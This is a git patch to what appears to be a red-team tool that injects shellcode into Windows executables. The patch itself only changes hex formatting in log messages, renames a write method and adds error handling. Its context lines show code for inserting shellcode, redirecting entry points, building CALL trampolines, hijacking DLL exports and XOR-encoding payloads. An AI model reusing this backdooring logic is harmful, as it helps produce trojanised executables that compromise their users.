From dacef30bb0a8baef01d30e67cd7e6009513a8594 Mon Sep 17 00:00:00 2001 From: Dobin Date: Mon, 4 Mar 2024 18:32:41 +0000 Subject: [PATCH] refactor: :x -> :X --- model/exehost.py | 2 +- pe/derbackdoorer.py | 14 +++++++------- pe/superpe.py | 10 +++++----- phases/assembler.py | 2 +- phases/injector.py | 6 +++--- supermega.py | 7 ++++++- 6 files changed, 23 insertions(+), 18 deletions(-) diff --git a/model/exehost.py b/model/exehost.py index 6ea183c..6194bbf 100644 --- a/model/exehost.py +++ b/model/exehost.py @@ -75,7 +75,7 @@ class ExeHost(): self.code_section = pehelper.get_code_section(self.superpe.pe) self.code_virtaddr = self.code_section.VirtualAddress self.code_size = self.code_section.Misc_VirtualSize - logger.info("---[ Injectable: Chosen code section: {} at 0x{:x} size: {}".format( + logger.info("---[ Injectable: Chosen code section: {} at 0x{:X} size: {}".format( self.code_section.Name.decode().rstrip('\x00'), self.code_virtaddr, self.code_size)) diff --git a/pe/derbackdoorer.py b/pe/derbackdoorer.py index d535dcd..1cd2177 100644 --- a/pe/derbackdoorer.py +++ b/pe/derbackdoorer.py @@ -46,7 +46,7 @@ Code section size : {sect_size} ''') offset = int((sect_size - len(self.shellcodeData)) / 2) - logger.debug(f'Inserting shellcode into 0x{offset:x} offset.') + logger.debug(f'Inserting shellcode into 0x{offset:X} offset.') self.superpe.pe.set_bytes_at_offset(offset, self.shellcodeData) self.shellcodeOffset = offset @@ -66,7 +66,7 @@ Trailing {sect_name} bytes: {hexdump(self.superpe.pe.get_data(self.superpe.pe.get_rva_from_offset(p)), p, 64)} ''', '\t') - logger.info(f'Shellcode injected into existing code section at RVA 0x{rva:x}') + logger.info(f'Shellcode injected into existing code section at RVA 0x{rva:X}') logger.debug(graph) return True @@ -76,7 +76,7 @@ Trailing {sect_name} bytes: rva = self.superpe.pe.get_rva_from_offset(self.shellcodeOffset) self.superpe.set_entrypoint(rva) - logger.info(f'Address Of Entry Point changed to: RVA 0x{rva:x}') + logger.info(f'Address Of Entry Point changed to: RVA 0x{rva:X}') return True elif self.runMode == InjectStyle.BackdoorCallInstr: @@ -114,7 +114,7 @@ Trailing {sect_name} bytes: if export[1].lower() == exportName.lower(): addr = self.superpe.pe.DIRECTORY_ENTRY_EXPORT.symbols[export[0]].address - logger.info(f'Found DLL Export "{exportName}" at RVA 0x{addr:x} . Attempting to hijack it...') + logger.info(f'Found DLL Export "{exportName}" at RVA 0x{addr:X} . Attempting to hijack it...') return addr return -1 @@ -188,7 +188,7 @@ Trailing {sect_name} bytes: while reg2 == reg: reg2 = random.choice(registers).upper() - enc, count = ks.asm(f'MOV {reg}, 0x{self.shellcodeAddr:x}') + enc, count = ks.asm(f'MOV {reg}, 0x{self.shellcodeAddr:X}') for instr2 in cs.disasm(bytes(enc), 0): addrOffset = len(instr2.bytes) - instr2.addr_size break @@ -197,7 +197,7 @@ Trailing {sect_name} bytes: found |= instr.mnemonic.lower() == 'call' if found: - logger.info(f'Backdooring entry point {instr.mnemonic.upper()} instruction at 0x{instr.address:x} into:') + logger.info(f'Backdooring entry point {instr.mnemonic.upper()} instruction at 0x{instr.address:X} into:') jump = random.choice([ f'CALL {reg}', @@ -211,7 +211,7 @@ Trailing {sect_name} bytes: #f'PUSH {reg} ; RET', ]) - trampoline = f'MOV {reg}, 0x{self.shellcodeAddr:x} ; {jump}' + trampoline = f'MOV {reg}, 0x{self.shellcodeAddr:X} ; {jump}' for ins in trampoline.split(';'): logger.info(f'\t{ins.strip()}') diff --git a/pe/superpe.py b/pe/superpe.py index 4aed9a4..8989748 100644 --- a/pe/superpe.py +++ b/pe/superpe.py @@ -161,7 +161,7 @@ class SuperPe(): # SizeOfBlock self.pe.set_dword_at_rva(addr + relocsSize + 4, sizeOfReloc) - logger.info(f'Adding {len(relocs)} relocations for Page RVA 0x{pageRva:x} - size of block: 0x{sizeOfReloc:x}') + logger.info(f'Adding {len(relocs)} relocations for Page RVA 0x{pageRva:X} - size of block: 0x{sizeOfReloc:X}') i = 0 for reloc in relocs: @@ -170,7 +170,7 @@ class SuperPe(): relocWord = (reloc_type | reloc_offset) self.pe.set_word_at_rva(relocDirRva + relocsSize + 8 + i * 2, relocWord) - logger.info(f'\tReloc{i} for addr 0x{reloc:x}: 0x{relocWord:x} - 0x{reloc_offset:x} - type: {imageBaseRelocType}') + logger.info(f'\tReloc{i} for addr 0x{reloc:X}: 0x{relocWord:X} - 0x{reloc_offset:X} - type: {imageBaseRelocType}') i += 1 @@ -183,9 +183,9 @@ class SuperPe(): self.pe.OPTIONAL_HEADER.AddressOfEntryPoint = entrypoint - def write(self, outfile: str): + def write_pe_to_file(self, outfile: str): self.pe.write(outfile) - + def disasmBytes(self, cs, ks, disasmData, startOffset, length, callback = None, maxDepth = 5): return self._disasmBytes(cs, ks, disasmData, startOffset, length, callback, maxDepth, 1) @@ -213,7 +213,7 @@ class SuperPe(): operand = instr.operands[0] if operand.type == capstone.CS_OP_IMM: - logger.debug('\t' * (depth+1) + f' -> OP_IMM: 0x{operand.value.imm:x}') + logger.debug('\t' * (depth+1) + f' -> OP_IMM: 0x{operand.value.imm:X}') logger.debug('') if callback: diff --git a/phases/assembler.py b/phases/assembler.py index dbccf7d..dbc0aa1 100644 --- a/phases/assembler.py +++ b/phases/assembler.py @@ -45,7 +45,7 @@ def merge_loader_payload( pass elif decoder_style == DecoderStyle.XOR_1: xor_key = config.xor_key - logger.info("---[ XOR payload with key 0x{:x}".format(xor_key)) + logger.info("---[ XOR payload with key 0x{:X}".format(xor_key)) payload_data = bytes([byte ^ xor_key for byte in payload_data]) logger.info("---[ Size: Stager: {} and Payload: {} Sum: {} ".format( diff --git a/phases/injector.py b/phases/injector.py index 8bd73b5..5f6e43d 100644 --- a/phases/injector.py +++ b/phases/injector.py @@ -58,7 +58,7 @@ def inject_exe( if True: injected_fix_data(superpe, project.carrier, project.exe_host) - superpe.write(exe_out) + superpe.write_pe_to_file(exe_out) # verify and log shellcode = file_readall_binary(shellcode_in) @@ -86,7 +86,7 @@ def injected_fix_iat(superpe: SuperPe, carrier: Carrier, exe_host: ExeHost): offset_from_code = code.index(iatRequest.placeholder) instruction_virtual_address = offset_from_code + exe_host.image_base + exe_host.code_virtaddr - logger.info(" Replace {} at VA 0x{:x} with call to IAT at VA 0x{:x}".format( + logger.info(" Replace {} at VA 0x{:X} with call to IAT at VA 0x{:X}".format( iatRequest.placeholder.hex(), instruction_virtual_address, destination_virtual_address )) jmp = assemble_and_disassemble_jump( @@ -147,7 +147,7 @@ def injected_fix_data(superpe: SuperPe, carrier: Carrier, exe_host: ExeHost): offset_from_datasection = code.index(datareuse_fixup.randbytes) instruction_virtual_address = offset_from_datasection + exe_host.image_base + exe_host.code_virtaddr destination_virtual_address = datareuse_fixup.addr - logger.info(" Replace {} at VA 0x{:x} with .rdata LEA at VA 0x{:x}".format( + logger.info(" Replace {} at VA 0x{:X} with .rdata LEA at VA 0x{:X}".format( datareuse_fixup.randbytes.hex(), instruction_virtual_address, destination_virtual_address )) lea = assemble_lea( diff --git a/supermega.py b/supermega.py index 3afe312..07e9f51 100644 --- a/supermega.py +++ b/supermega.py @@ -197,7 +197,12 @@ def start(settings: Settings): shutil.move(main_shc_file + ".sgn", main_shc_file) # inject merged loader into an exe - phases.injector.inject_exe(main_shc_file, settings, project) + try: + phases.injector.inject_exe(main_shc_file, settings, project) + except PermissionError as e: + logger.error(f'Error writing file: {e}') + return exit(2) + observer.add_code("exe_final", extract_code_from_exe_file_ep(settings.inject_exe_out, 300)) # Start/verify it at the end